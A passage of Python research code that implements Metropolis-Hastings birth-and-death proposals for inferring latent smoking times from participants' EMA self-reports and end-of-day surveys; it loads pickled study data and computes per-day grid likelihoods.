for this_day in all_days:
# Initialize Latent object
latent_obj = Latent(participant = this_participant,
day = this_day,
latent_data = curr_dict_latent_data[this_participant][this_day],
params = copy.deepcopy(curr_latent_params))
# Initialize EODSurvey object
eodsurvey_obj = EODSurvey(participant = this_participant,
day = this_day,
latent_data = curr_dict_latent_data[this_participant][this_day],
observed_data = curr_dict_observed_eod_survey[this_participant][this_day],
params = copy.deepcopy(curr_eodsurvey_params))
# Initialize SelfReport object
selfreport_obj = SelfReport(participant = this_participant,
day = this_day,
latent_data = curr_dict_latent_data[this_participant][this_day],
observed_data = curr_dict_observed_ema[this_participant][this_day],
params = copy.deepcopy(curr_selfreport_params))
# Initialize RandomEMA object
randomema_obj = RandomEMA(participant = this_participant,
day = this_day,
latent_data = curr_dict_latent_data[this_participant][this_day],
observed_data = curr_dict_observed_ema[this_participant][this_day],
params = copy.deepcopy(curr_randomema_params))
# Calculate likelihood
selfreport_obj.match() # this line
randomema_obj.match() # and this line should yield the same output
total_loglik = latent_obj.calc_loglik() + eodsurvey_obj.calc_loglik() + selfreport_obj.calc_loglik() + randomema_obj.calc_loglik()
total_lik = np.exp(total_loglik)
current_dict.update({this_day:{'x':curr_dict_latent_data[this_participant][this_day]['hours_since_start_day'],
'pi_x':total_lik}})
dict_current_state.update({this_participant:current_dict})
return dict_current_state
# %%
# Helper functions for birth or death proposal
def get_this_loglik(x):
loglik = x.calc_loglik()
return(x.index, loglik)
# %%
# Helper functions for birth proposal
def construct_grid(increment, day_length):
# Construct grid of points to consider for a smart birth
if day_length <= increment:
init_grid = np.array([0, day_length])
else:
init_grid = np.arange(0, day_length, increment)
return init_grid
def get_sets_along_grid_birth(init_grid, current_latent_data):
# What are the various configurations of points to consider in a smart/dumb birth proposal?
# We will consider birthing a new point from init_grid that does not yet exist in current_latent_data
grid = np.setdiff1d(ar1 = init_grid, ar2 = current_latent_data)
grid = np.sort(grid)
M = len(grid)
sets_along_grid = {}
for idx_grid in range(0,M):
new_latent_data = np.append(current_latent_data, grid[idx_grid])
new_latent_data = np.sort(new_latent_data)
sets_along_grid.update({idx_grid:new_latent_data})
return grid, sets_along_grid
def parallelize_class_method(list_objects, num_processes = 8):
'''
list_objects is a list containing instances of classes
'''
with Pool(processes = num_processes) as p:
my_output = p.map(get_this_loglik, list_objects)
return my_output
def grid_likelihood_latent_birth(current_participant, current_day, latent_params, dict_latent_data):
'''
Calculate the likelihood at each point of a grid
Note that smart birth and smart death differ in the grids they consider
'''
# Initialize Latent object
init_latent_obj = Latent(participant = current_participant,
day = current_day,
latent_data = dict_latent_data[current_participant][current_day],
params = copy.deepcopy(latent_params))
# Construct grid for smart birth
latent_grid = construct_grid(increment = 1/60, day_length = init_latent_obj.latent_data['day_length'])
latent_grid, latent_grid_sets = get_sets_along_grid_birth(init_grid = latent_grid, current_latent_data = init_latent_obj.latent_data['hours_since_start_day'])
# Work with Latent class objects
latent_total_grid_sets = len(latent_grid_sets)
# Each element of the list is an instance of the Latent class
latent_my_list = []
for idx_set in range(0, latent_total_grid_sets):
candidate_latent_data = copy.deepcopy(init_latent_obj.latent_data)
candidate_latent_data['hours_since_start_day'] = latent_grid_sets[idx_set]
latent_my_list.append(Latent(participant = current_participant,
day = current_day,
latent_data = candidate_latent_data,
params = copy.deepcopy(latent_params),
index = idx_set))
element_wise_loglik = []
for idx_set in range(0, latent_total_grid_sets):
res = latent_my_list[idx_set].calc_loglik()
element_wise_loglik.append(res)
element_wise_lik = np.exp(element_wise_loglik)
f = interpolate.interp1d(x = latent_grid, y = element_wise_lik, fill_value="extrapolate")
return f
def grid_likelihood_eodsurvey_birth(current_participant, current_day, latent_params, eodsurvey_params, dict_latent_data, dict_observed_eod_survey):
'''
Calculate the likelihood at each point of a grid
'''
# Initialize EODSurvey object
init_eodsurvey_obj = EODSurvey(participant = current_participant,
day = current_day,
latent_data = dict_latent_data[current_participant][current_day],
observed_data = dict_observed_eod_survey[current_participant][current_day],
params = copy.deepcopy(eodsurvey_params))
# Construct grid for smart birth
eodsurvey_grid = construct_grid(increment = 30/60, day_length = init_eodsurvey_obj.latent_data['day_length'])
eodsurvey_grid, eodsurvey_grid_sets = get_sets_along_grid_birth(init_grid = eodsurvey_grid, current_latent_data = init_eodsurvey_obj.latent_data['hours_since_start_day'])
# Work with EODSurvey class objects
eodsurvey_total_grid_sets = len(eodsurvey_grid_sets)
# Each element of the list is an instance of the EODSurvey class
eodsurvey_my_list = []
for idx_set in range(0, eodsurvey_total_grid_sets):
candidate_latent_data = copy.deepcopy(init_eodsurvey_obj.latent_data)
candidate_latent_data['hours_since_start_day'] = eodsurvey_grid_sets[idx_set]
eodsurvey_my_list.append(EODSurvey(participant = current_participant,
day = current_day,
latent_data = candidate_latent_data,
observed_data = dict_observed_eod_survey[current_participant][current_day],
params = copy.deepcopy(eodsurvey_params),
index = idx_set))
# No need to parallelize calculations when current number of latent smoking times is less than 6
if len(init_eodsurvey_obj.latent_data['hours_since_start_day']) < 6:
eodsurvey_grid_loglik = []
for idx_set in range(0, eodsurvey_total_grid_sets):
res = eodsurvey_my_list[idx_set].calc_loglik()
eodsurvey_grid_loglik.append(res)
else:
eodsurvey_my_output = parallelize_class_method(list_objects = eodsurvey_my_list)
eodsurvey_my_output = sorted(eodsurvey_my_output, key=lambda tup: tup[0], reverse=False)
# Get calculated loglik
eodsurvey_grid_loglik = []
for a_tuple in eodsurvey_my_output:
eodsurvey_grid_loglik.append(a_tuple[1])
eodsurvey_grid_lik = np.exp(eodsurvey_grid_loglik)
# Perform interpolation of eodsurvey at the minute-level
# Note: interpolate likelihood instead of loglikelihood to avoid having to interpolate over -inf values. This will produce an error.
f = interpolate.interp1d(x = eodsurvey_grid, y = eodsurvey_grid_lik, fill_value="extrapolate")
return f
def grid_likelihood_selfreport_birth(current_participant, current_day, latent_params, selfreport_params, dict_latent_data, dict_observed_ema):
'''
Calculate the likelihood at each point of a grid
'''
# Initialize SelfReport object
init_selfreport_obj = SelfReport(participant = current_participant,
day = current_day,
latent_data = dict_latent_data[current_participant][current_day],
observed_data = dict_observed_ema[current_participant][current_day],
params = copy.deepcopy(selfreport_params))
# Construct grid for smart birth
selfreport_grid = construct_grid(increment = 1/60, day_length = init_selfreport_obj.latent_data['day_length'])
selfreport_grid, selfreport_grid_sets = get_sets_along_grid_birth(init_grid = selfreport_grid, current_latent_data = init_selfreport_obj.latent_data['hours_since_start_day'])
# Work with selfreport class objects
selfreport_total_grid_sets = len(selfreport_grid_sets)
# Each element of the list is an instance of the selfreport class
selfreport_my_list = []
for idx_set in range(0, selfreport_total_grid_sets):
candidate_latent_data = copy.deepcopy(init_selfreport_obj.latent_data)
candidate_latent_data['hours_since_start_day'] = selfreport_grid_sets[idx_set]
selfreport_my_list.append(SelfReport(participant = current_participant,
day = current_day,
latent_data = candidate_latent_data,
observed_data = dict_observed_ema[current_participant][current_day],
params = copy.deepcopy(selfreport_params),
index = idx_set))
element_wise_loglik = []
for idx_set in range(0, selfreport_total_grid_sets):
selfreport_my_list[idx_set].match()
res = selfreport_my_list[idx_set].calc_loglik()
element_wise_loglik.append(res)
element_wise_lik = np.exp(element_wise_loglik)
f = interpolate.interp1d(x = selfreport_grid, y = element_wise_lik, fill_value="extrapolate")
return f
def grid_likelihood_randomema_birth(current_participant, current_day, latent_params, randomema_params, dict_latent_data, dict_observed_ema):
'''
Calculate the likelihood at each point of a grid
'''
# Initialize RandomEMA object
init_randomema_obj = RandomEMA(participant = current_participant,
day = current_day,
latent_data = dict_latent_data[current_participant][current_day],
observed_data = dict_observed_ema[current_participant][current_day],
params = copy.deepcopy(randomema_params))
# Construct grid for smart birth
randomema_grid = construct_grid(increment = 1/60, day_length = init_randomema_obj.latent_data['day_length'])
randomema_grid, randomema_grid_sets = get_sets_along_grid_birth(init_grid = randomema_grid, current_latent_data = init_randomema_obj.latent_data['hours_since_start_day'])
# Work with randomema class objects
randomema_total_grid_sets = len(randomema_grid_sets)
# Each element of the list is an instance of the randomema class
randomema_my_list = []
for idx_set in range(0, randomema_total_grid_sets):
candidate_latent_data = copy.deepcopy(init_randomema_obj.latent_data)
candidate_latent_data['hours_since_start_day'] = randomema_grid_sets[idx_set]
randomema_my_list.append(RandomEMA(participant = current_participant,
day = current_day,
latent_data = candidate_latent_data,
observed_data = dict_observed_ema[current_participant][current_day],
params = copy.deepcopy(randomema_params),
index = idx_set))
element_wise_loglik = []
for idx_set in range(0, randomema_total_grid_sets):
randomema_my_list[idx_set].match()
res = randomema_my_list[idx_set].calc_loglik()
element_wise_loglik.append(res)
element_wise_lik = np.exp(element_wise_loglik)
f = interpolate.interp1d(x = randomema_grid, y = element_wise_lik, fill_value="extrapolate")
return f
# %%
def get_for_all_smart_birth_lik(use_increment,
all_participant_ids,
all_days,
curr_dict_latent_data,
curr_dict_observed_ema,
curr_dict_observed_eod_survey,
curr_latent_params,
curr_selfreport_params,
curr_randomema_params,
curr_eodsurvey_params):
# Latent model: Likelihood corresponding to each point on the grid
dict_latent_likelihood = {}
for this_participant in all_participant_ids:
current_dict = {}
for this_day in all_days:
interp_func = grid_likelihood_latent_birth(current_participant = this_participant,
current_day = this_day,
latent_params = curr_latent_params,
dict_latent_data = curr_dict_latent_data)
use_this_grid = construct_grid(increment = use_increment, day_length = curr_dict_latent_data[this_participant][this_day]['day_length'])
smoothed_lik = interp_func(use_this_grid)
# Note: if coarse grid ends at t* and the likelihood at t* is very close to zero,
# e.g., 1e-13, then a point on a fine grid, say at t* + 10 minutes
# might have a negative interpolated value, say -1e-10
# when this happens, we set the interpolated value to zero
smoothed_lik[(smoothed_lik < 0)] = 0
current_dict.update({this_day:smoothed_lik})
dict_latent_likelihood.update({this_participant:current_dict})
# MEM -- end of day survey subcomponent: Likelihood corresponding to each point on the grid
dict_mem_eodsurvey_likelihood = {}
for this_participant in all_participant_ids:
current_dict = {}
for this_day in all_days:
interp_func = grid_likelihood_eodsurvey_birth(current_participant = this_participant,
current_day = this_day,
latent_params = curr_latent_params,
eodsurvey_params = curr_eodsurvey_params,
dict_latent_data = curr_dict_latent_data,
dict_observed_eod_survey = curr_dict_observed_eod_survey)
use_this_grid = construct_grid(increment = use_increment, day_length = curr_dict_latent_data[this_participant][this_day]['day_length'])
smoothed_lik = interp_func(use_this_grid)
# Note: if coarse grid ends at t* and the likelihood at t* is very close to zero,
# e.g., 1e-13, then a point on a fine grid, say at t* + 10 minutes
# might have a negative interpolated value, say -1e-10
# when this happens, we set the interpolated value to zero
smoothed_lik[(smoothed_lik < 0)] = 0
current_dict.update({this_day:smoothed_lik})
dict_mem_eodsurvey_likelihood.update({this_participant:current_dict})
# MEM -- selfreport subcomponent: Likelihood corresponding to each point on the grid
dict_mem_selfreport_likelihood = {}
for this_participant in all_participant_ids:
current_dict = {}
for this_day in all_days:
interp_func = grid_likelihood_selfreport_birth(current_participant = this_participant,
current_day = this_day,
latent_params = curr_latent_params,
selfreport_params = curr_selfreport_params,
dict_latent_data = curr_dict_latent_data,
dict_observed_ema = curr_dict_observed_ema)
use_this_grid = construct_grid(increment = use_increment, day_length = curr_dict_latent_data[this_participant][this_day]['day_length'])
smoothed_lik = interp_func(use_this_grid)
# Note: if coarse grid ends at t* and the likelihood at t* is very close to zero,
# e.g., 1e-13, then a point on a fine grid, say at t* + 10 minutes
# might have a negative interpolated value, say -1e-10
# when this happens, we set the interpolated value to zero
smoothed_lik[(smoothed_lik < 0)] = 0
current_dict.update({this_day:smoothed_lik})
dict_mem_selfreport_likelihood.update({this_participant:current_dict})
# MEM -- Random EMA subcomponent: Likelihood corresponding to each point on the grid
dict_mem_randomema_likelihood = {}
for this_participant in all_participant_ids:
current_dict = {}
for this_day in all_days: # all_days here
interp_func = grid_likelihood_randomema_birth(current_participant = this_participant,
current_day = this_day,
latent_params = curr_latent_params,
randomema_params = curr_randomema_params,
dict_latent_data = curr_dict_latent_data,
dict_observed_ema = curr_dict_observed_ema)
use_this_grid = construct_grid(increment = use_increment, day_length = curr_dict_latent_data[this_participant][this_day]['day_length'])
smoothed_lik = interp_func(use_this_grid)
# Note: if coarse grid ends at t* and the likelihood at t* is very close to zero,
# e.g., 1e-13, then a point on a fine grid, say at t* + 10 minutes
# might have a negative interpolated value, say -1e-10
# when this happens, we set the interpolated value to zero
smoothed_lik[(smoothed_lik < 0)] = 0
current_dict.update({this_day:smoothed_lik})
dict_mem_randomema_likelihood.update({this_participant:current_dict})
dict_all = {'latent':dict_latent_likelihood,
'eodsurvey':dict_mem_eodsurvey_likelihood,
'selfreport':dict_mem_selfreport_likelihood,
'randomema':dict_mem_randomema_likelihood,
'all_participant_ids':all_participant_ids,
'all_days':all_days,
'curr_dict_latent_data':curr_dict_latent_data,
'use_increment':use_increment}
return dict_all
# %%
def get_for_all_smart_birth_pdf(dict_smart_birth_lik, dict_current_state):
dict_latent_likelihood = copy.deepcopy(dict_smart_birth_lik['latent'])
dict_mem_eodsurvey_likelihood = copy.deepcopy(dict_smart_birth_lik['eodsurvey'])
dict_mem_selfreport_likelihood = copy.deepcopy(dict_smart_birth_lik['selfreport'])
dict_mem_randomema_likelihood = copy.deepcopy(dict_smart_birth_lik['randomema'])
all_participant_ids = dict_smart_birth_lik['all_participant_ids']
all_days = dict_smart_birth_lik['all_days']
curr_dict_latent_data = dict_smart_birth_lik['curr_dict_latent_data']
use_increment = dict_smart_birth_lik['use_increment']
dict_smart_birth_pdf = {}
for current_participant in all_participant_ids:
current_dict_smart_birth_pdf = {}
for current_day in all_days:
# Calculate smart birth pdf
lik_latent = dict_latent_likelihood[current_participant][current_day]
lik_eodsurvey = dict_mem_eodsurvey_likelihood[current_participant][current_day]
lik_selfreport = dict_mem_selfreport_likelihood[current_participant][current_day]
lik_randomema = dict_mem_randomema_likelihood[current_participant][current_day]
current_element_wise_lik = lik_latent * lik_eodsurvey * lik_selfreport * lik_randomema
current_denominator_pdf_smart_birth = np.sum(current_element_wise_lik)
current_pdf_smart_birth = current_element_wise_lik/current_denominator_pdf_smart_birth
# Update dictionary for this day
use_this_grid = construct_grid(increment = use_increment, day_length = curr_dict_latent_data[current_participant][current_day]['day_length'])
current_grid, sets_along_current_grid = get_sets_along_grid_birth(use_this_grid, dict_current_state[current_participant][current_day]['x'])
current_dict_smart_birth_pdf.update({current_day:{'grid':current_grid,
'proposed_latent_smoking_times':sets_along_current_grid,
'pdf_smart_birth':current_pdf_smart_birth,
'lik_smart_birth':current_element_wise_lik}})
# Update dictionary for this person
dict_smart_birth_pdf.update({current_participant:current_dict_smart_birth_pdf})
dict_all = {'dict_smart_birth_pdf':dict_smart_birth_pdf,
'all_participant_ids':all_participant_ids,
'all_days':all_days}
return dict_all
# %%
# Helper functions for death proposal
def get_sets_along_grid_death(current_latent_data):
# What are the various configurations of points to consider in a smart/dumb death proposal?
M = len(current_latent_data)
if M == 0:
sets_along_grid = np.array([])
grid = np.array([])
else:
current_latent_data = np.sort(current_latent_data)
grid = current_latent_data
sets_along_grid = {}
for idx_grid in range(0,M):
new_latent_data = np.delete(current_latent_data, idx_grid)
new_latent_data = np.sort(new_latent_data)
sets_along_grid.update({idx_grid:new_latent_data})
return grid, sets_along_grid
# %%
def grid_likelihood_latent_death(current_participant, current_day, latent_params, dict_latent_data):
'''
Calculate the likelihood at each point of a grid
Note that smart birth and smart death differ in the grids they consider
'''
# Initialize Latent object
init_latent_obj = Latent(participant = current_participant,
day = current_day,
latent_data = dict_latent_data[current_participant][current_day],
params = copy.deepcopy(latent_params))
# Construct grid for smart death
current_grid, latent_grid_sets = get_sets_along_grid_death(current_latent_data = init_latent_obj.latent_data['hours_since_start_day'])
# Work with Latent class objects
latent_total_grid_sets = len(latent_grid_sets)
# Each element of the list is an instance of the Latent class
latent_my_list = []
for idx_set in range(0, latent_total_grid_sets):
candidate_latent_data = copy.deepcopy(init_latent_obj.latent_data)
candidate_latent_data['hours_since_start_day'] = latent_grid_sets[idx_set]
latent_my_list.append(Latent(participant = current_participant,
day = current_day,
latent_data = candidate_latent_data,
params = copy.deepcopy(latent_params),
index = idx_set))
element_wise_loglik = []
for idx_set in range(0, latent_total_grid_sets):
res = latent_my_list[idx_set].calc_loglik()
element_wise_loglik.append(res)
element_wise_lik = np.exp(element_wise_loglik)
return element_wise_lik
# %%
def grid_likelihood_eodsurvey_death(current_participant, current_day, latent_params, eodsurvey_params, dict_latent_data, dict_observed_eod_survey):
'''
Calculate the likelihood at each point of a grid
'''
# Initialize EODSurvey object
init_eodsurvey_obj = EODSurvey(participant = current_participant,
day = current_day,
latent_data = dict_latent_data[current_participant][current_day],
observed_data = dict_observed_eod_survey[current_participant][current_day],
params = copy.deepcopy(eodsurvey_params))
# Construct grid for smart death
current_grid, eodsurvey_grid_sets = get_sets_along_grid_death(current_latent_data = init_eodsurvey_obj.latent_data['hours_since_start_day'])
# Work with EODSurvey class objects
eodsurvey_total_grid_sets = len(eodsurvey_grid_sets)
# Each element of the list is an instance of the EODSurvey class
eodsurvey_my_list = []
for idx_set in range(0, eodsurvey_total_grid_sets):
candidate_latent_data = copy.deepcopy(init_eodsurvey_obj.latent_data)
candidate_latent_data['hours_since_start_day'] = eodsurvey_grid_sets[idx_set]
eodsurvey_my_list.append(EODSurvey(participant = current_participant,
day = current_day,
latent_data = candidate_latent_data,
observed_data = dict_observed_eod_survey[current_participant][current_day],
params = copy.deepcopy(eodsurvey_params),
index = idx_set))
# No need to parallelize calculations when current number of latent smoking times is less than 6
if len(init_eodsurvey_obj.latent_data['hours_since_start_day']) < 6:
eodsurvey_grid_loglik = []
for idx_set in range(0, eodsurvey_total_grid_sets):
res = eodsurvey_my_list[idx_set].calc_loglik()
eodsurvey_grid_loglik.append(res)
else:
eodsurvey_my_output = parallelize_class_method(list_objects = eodsurvey_my_list)
eodsurvey_my_output = sorted(eodsurvey_my_output, key=lambda tup: tup[0], reverse=False)
# Get calculated loglik
eodsurvey_grid_loglik = []
for a_tuple in eodsurvey_my_output:
eodsurvey_grid_loglik.append(a_tuple[1])
eodsurvey_grid_lik = np.exp(eodsurvey_grid_loglik)
return eodsurvey_grid_lik
def grid_likelihood_selfreport_death(current_participant, current_day, latent_params, selfreport_params, dict_latent_data, dict_observed_ema):
'''
Calculate the likelihood at each point of a grid
'''
# Initialize SelfReport object
init_selfreport_obj = SelfReport(participant = current_participant,
day = current_day,
latent_data = dict_latent_data[current_participant][current_day],
observed_data = dict_observed_ema[current_participant][current_day],
params = copy.deepcopy(selfreport_params))
# Construct grid for smart death
current_grid, selfreport_grid_sets = get_sets_along_grid_death(current_latent_data = init_selfreport_obj.latent_data['hours_since_start_day'])
# Work with selfreport class objects
selfreport_total_grid_sets = len(selfreport_grid_sets)
# Each element of the list is an instance of the selfreport class
selfreport_my_list = []
for idx_set in range(0, selfreport_total_grid_sets):
candidate_latent_data = copy.deepcopy(init_selfreport_obj.latent_data)
candidate_latent_data['hours_since_start_day'] = selfreport_grid_sets[idx_set]
selfreport_my_list.append(SelfReport(participant = current_participant,
day = current_day,
latent_data = candidate_latent_data,
observed_data = dict_observed_ema[current_participant][current_day],
params = copy.deepcopy(selfreport_params),
index = idx_set))
element_wise_loglik = []
for idx_set in range(0, selfreport_total_grid_sets):
selfreport_my_list[idx_set].match()
res = selfreport_my_list[idx_set].calc_loglik()
element_wise_loglik.append(res)
element_wise_lik = np.exp(element_wise_loglik)
return element_wise_lik
def grid_likelihood_randomema_death(current_participant, current_day, latent_params, randomema_params, dict_latent_data, dict_observed_ema):
'''
Calculate the likelihood at each point of a grid
'''
# Initialize RandomEMA object
init_randomema_obj = RandomEMA(participant = current_participant,
day = current_day,
latent_data = dict_latent_data[current_participant][current_day],
observed_data = dict_observed_ema[current_participant][current_day],
params = copy.deepcopy(randomema_params))
# Construct grid for smart death
current_grid, randomema_grid_sets = get_sets_along_grid_death(current_latent_data = init_randomema_obj.latent_data['hours_since_start_day'])
# Work with randomema class objects
randomema_total_grid_sets = len(randomema_grid_sets)
# Each element of the list is an instance of the randomema class
randomema_my_list = []
for idx_set in range(0, randomema_total_grid_sets):
candidate_latent_data = copy.deepcopy(init_randomema_obj.latent_data)
candidate_latent_data['hours_since_start_day'] = randomema_grid_sets[idx_set]
randomema_my_list.append(RandomEMA(participant = current_participant,
day = current_day,
latent_data = candidate_latent_data,
observed_data = dict_observed_ema[current_participant][current_day],
params = copy.deepcopy(randomema_params),
index = idx_set))
element_wise_loglik = []
for idx_set in range(0, randomema_total_grid_sets):
randomema_my_list[idx_set].match()
res = randomema_my_list[idx_set].calc_loglik()
element_wise_loglik.append(res)
element_wise_lik = np.exp(element_wise_loglik)
return element_wise_lik
# %%
def get_for_all_smart_death_lik(all_participant_ids,
all_days,
curr_dict_latent_data,
curr_dict_observed_ema,
curr_dict_observed_eod_survey,
curr_latent_params,
curr_selfreport_params,
curr_randomema_params,
curr_eodsurvey_params):
# Latent model: Likelihood corresponding to each point on the grid
dict_latent_likelihood = {}
for this_participant in all_participant_ids:
current_dict = {}
for this_day in all_days:
lik = grid_likelihood_latent_death(current_participant = this_participant,
current_day = this_day,
latent_params = curr_latent_params,
dict_latent_data = curr_dict_latent_data)
current_dict.update({this_day:lik})
dict_latent_likelihood.update({this_participant:current_dict})
# MEM -- end of day survey subcomponent: Likelihood corresponding to each point on the grid
dict_mem_eodsurvey_likelihood = {}
for this_participant in all_participant_ids:
current_dict = {}
for this_day in all_days:
lik = grid_likelihood_eodsurvey_death(current_participant = this_participant,
current_day = this_day,
latent_params = curr_latent_params,
eodsurvey_params = curr_eodsurvey_params,
dict_latent_data = curr_dict_latent_data,
dict_observed_eod_survey = curr_dict_observed_eod_survey)
current_dict.update({this_day:lik})
dict_mem_eodsurvey_likelihood.update({this_participant:current_dict})
# MEM -- selfreport subcomponent: Likelihood corresponding to each point on the grid
dict_mem_selfreport_likelihood = {}
for this_participant in all_participant_ids:
current_dict = {}
for this_day in all_days:
lik = grid_likelihood_selfreport_death(current_participant = this_participant,
current_day = this_day,
latent_params = curr_latent_params,
selfreport_params = curr_selfreport_params,
dict_latent_data = curr_dict_latent_data,
dict_observed_ema = curr_dict_observed_ema)
current_dict.update({this_day:lik})
dict_mem_selfreport_likelihood.update({this_participant:current_dict})
# MEM -- Random EMA subcomponent: Likelihood corresponding to each point on the grid
dict_mem_randomema_likelihood = {}
for this_participant in all_participant_ids:
current_dict = {}
for this_day in all_days: # all_days here
lik = grid_likelihood_randomema_death(current_participant = this_participant,
current_day = this_day,
latent_params = curr_latent_params,
randomema_params = curr_randomema_params,
dict_latent_data = curr_dict_latent_data,
dict_observed_ema = curr_dict_observed_ema)
current_dict.update({this_day:lik})
dict_mem_randomema_likelihood.update({this_participant:current_dict})
dict_all = {'latent':dict_latent_likelihood,
'eodsurvey':dict_mem_eodsurvey_likelihood,
'selfreport':dict_mem_selfreport_likelihood,
'randomema':dict_mem_randomema_likelihood,
'all_participant_ids':all_participant_ids,
'all_days':all_days,
'curr_dict_latent_data':curr_dict_latent_data}
return dict_all
# %%
def get_for_all_smart_death_pdf(dict_smart_death_lik, dict_current_state):
dict_latent_likelihood = copy.deepcopy(dict_smart_death_lik['latent'])
dict_mem_eodsurvey_likelihood = copy.deepcopy(dict_smart_death_lik['eodsurvey'])
dict_mem_selfreport_likelihood = copy.deepcopy(dict_smart_death_lik['selfreport'])
dict_mem_randomema_likelihood = copy.deepcopy(dict_smart_death_lik['randomema'])
all_participant_ids = dict_smart_death_lik['all_participant_ids']
all_days = dict_smart_death_lik['all_days']
curr_dict_latent_data = dict_smart_death_lik['curr_dict_latent_data']
dict_smart_death_pdf = {}
for current_participant in all_participant_ids:
current_dict_smart_death_pdf = {}
for current_day in all_days:
if len(dict_current_state[current_participant][current_day]['x'])==0:
current_element_wise_lik = np.array([])
current_pdf_smart_death = np.array([])
# Update dictionary for this day
current_grid, sets_along_current_grid = get_sets_along_grid_death(current_latent_data = dict_current_state[current_participant][current_day]['x'])
elif len(dict_current_state[current_participant][current_day]['x'])==1:
# Calculate likelihood of moving to new state (deleting the one existing point)
lik_latent = dict_latent_likelihood[current_participant][current_day]
lik_eodsurvey = dict_mem_eodsurvey_likelihood[current_participant][current_day]
lik_selfreport = dict_mem_selfreport_likelihood[current_participant][current_day]
lik_randomema = dict_mem_randomema_likelihood[current_participant][current_day]
current_element_wise_lik = lik_latent * lik_eodsurvey * lik_selfreport * lik_randomema
current_pdf_smart_death = np.array([1])
# Update dictionary for this day
current_grid, sets_along_current_grid = get_sets_along_grid_death(current_latent_data = dict_current_state[current_participant][current_day]['x'])
else:
# Calculate smart death pdf
lik_latent = dict_latent_likelihood[current_participant][current_day]
lik_eodsurvey = dict_mem_eodsurvey_likelihood[current_participant][current_day]
lik_selfreport = dict_mem_selfreport_likelihood[current_participant][current_day]
lik_randomema = dict_mem_randomema_likelihood[current_participant][current_day]
current_element_wise_lik = lik_latent * lik_eodsurvey * lik_selfreport * lik_randomema
current_denominator_pdf_smart_death = np.sum(current_element_wise_lik)
current_pdf_smart_death = current_element_wise_lik/current_denominator_pdf_smart_death
# Update dictionary for this day
current_grid, sets_along_current_grid = get_sets_along_grid_death(current_latent_data = dict_current_state[current_participant][current_day]['x'])
current_dict_smart_death_pdf.update({current_day:{'grid':current_grid,
'proposed_latent_smoking_times':sets_along_current_grid,
'pdf_smart_death':current_pdf_smart_death,
'lik_smart_death':current_element_wise_lik}})
# Update dictionary for this person
dict_smart_death_pdf.update({current_participant:current_dict_smart_death_pdf})
dict_all = {'dict_smart_death_pdf':dict_smart_death_pdf,
'all_participant_ids':all_participant_ids,
'all_days':all_days}
return dict_all
# %%
if __name__ == '__main__':
exec(open('../../env_vars.py').read())
dir_picklejar = os.environ['dir_picklejar']
filename = os.path.join(os.path.realpath(dir_picklejar), 'data_day_limits')
infile = open(filename,'rb')
data_day_limits = pickle.load(infile)
infile.close()
filename = os.path.join(os.path.realpath(dir_picklejar), 'init_latent_data_small')
infile = open(filename,'rb')
init_dict_latent_data = pickle.load(infile) # Initialization of the latent smoking times
infile.close()
filename = os.path.join(os.path.realpath(dir_picklejar), 'observed_dict_eod_survey')
infile = open(filename,'rb')
init_dict_observed_eod_survey = pickle.load(infile)
infile.close()
filename = os.path.join(os.path.realpath(dir_picklejar), 'observed_dict_all_ema')
infile = open(filename,'rb')
init_dict_observed_ema = pickle.load(infile)
infile.close()
# %%
# Enumerate all unique participant ID's and study days
use_this_participant = None
use_this_day = None
all_participant_ids = data_day_limits['participant_id'].unique() # [use_this_participant]
all_days = data_day_limits['study_day'].unique() # [use_this_day]
# %%
all_iter_dict_mh_ratio = {}
total_iter = 10
for current_iter in np.arange(total_iter):
# What is the likelihood of the current state?
current_state = get_for_all_current_state_lik(all_participant_ids = all_participant_ids,
all_days = all_days,
curr_dict_latent_data = init_dict_latent_data,
curr_dict_observed_ema = init_dict_observed_ema,
curr_dict_observed_eod_survey = init_dict_observed_eod_survey,
curr_latent_params = {'lambda_prequit':1, 'lambda_postquit':1},
curr_selfreport_params = {'prob_reporting_when_any': 0.90, 'prob_reporting_when_none': 0.01, 'lambda_delay': 0.5, 'sd': 30/60},
curr_randomema_params = {'prob_reporting_when_any': 0.90, 'prob_reporting_when_none': 0.01, 'sd': 30/60},
curr_eodsurvey_params = {'recall_epsilon':3, 'sd': 60/60, 'rho':0.8, 'budget':10})
select_combo = np.random.binomial(n=1, p=0.5, size=1)
select_combo = select_combo[0] * 1.0
# -------------------------------------------------------------------------
# Choose a smart birth but dumb death combo
# -------------------------------------------------------------------------
if select_combo == 1:
select_move = np.random.binomial(n=1, p=0.5, size=1)
select_move = select_move[0] * 1.0
#######################################################################
# if select_move==1, propose to add a point
# smart birth pdf will be used as the proposal distribution
#######################################################################
if select_move == 1:
# Calculate likelihood for each point on the grid
smart_birth_lik = get_for_all_smart_birth_lik(use_increment = 1/60,
all_participant_ids = all_participant_ids,
all_days = all_days,
curr_dict_latent_data = init_dict_latent_data,
curr_dict_observed_ema = init_dict_observed_ema,
curr_dict_observed_eod_survey = init_dict_observed_eod_survey,
curr_latent_params = {'lambda_prequit':1, 'lambda_postquit':1},
curr_selfreport_params = {'prob_reporting_when_any': 0.90, 'prob_reporting_when_none': 0.01, 'lambda_delay': 0.5, 'sd': 30/60},
curr_randomema_params = {'prob_reporting_when_any': 0.90, 'prob_reporting_when_none': 0.01, 'sd': 30/60},
curr_eodsurvey_params = {'recall_epsilon':3, 'sd': 60/60, 'rho':0.8, 'budget':10})
# Complete calculation of smart birth pdf
dict_smart_birth_pdf = get_for_all_smart_birth_pdf(dict_smart_birth_lik = smart_birth_lik, dict_current_state = current_state)
tmp_dict_latent_data = copy.deepcopy(init_dict_latent_data)
dict_mh_ratio = {}
for current_participant in all_participant_ids:
current_dict_mh_ratio = {}
for current_day in all_days:
arr_probs = dict_smart_birth_pdf['dict_smart_birth_pdf'][current_participant][current_day]['pdf_smart_birth']
grid_size = len(arr_probs)
selected_idx = np.random.choice(a = np.arange(grid_size), size=1, replace = True, p = arr_probs)
selected_idx = selected_idx[0]
proposed_point = dict_smart_birth_pdf['dict_smart_birth_pdf'][current_participant][current_day]['grid'][selected_idx]
proposed_set = dict_smart_birth_pdf['dict_smart_birth_pdf'][current_participant][current_day]['proposed_latent_smoking_times'][selected_idx]
tmp_dict_latent_data[current_participant][current_day]['hours_since_start_day'] = proposed_set
tmp_dict_latent_data[current_participant][current_day]['latent_event_order'] = np.arange(len(proposed_set))
q_xprime_given_x = dict_smart_birth_pdf['dict_smart_birth_pdf'][current_participant][current_day]['pdf_smart_birth'][selected_idx]
q_x_given_xprime = 1/len(proposed_set) # Note that proposed_set is an array that will always be AT LEAST length 1
current_dict_mh_ratio.update({current_day:{'select_combo':select_combo,
'select_move':select_move,
'q_xprime_given_x':q_xprime_given_x,
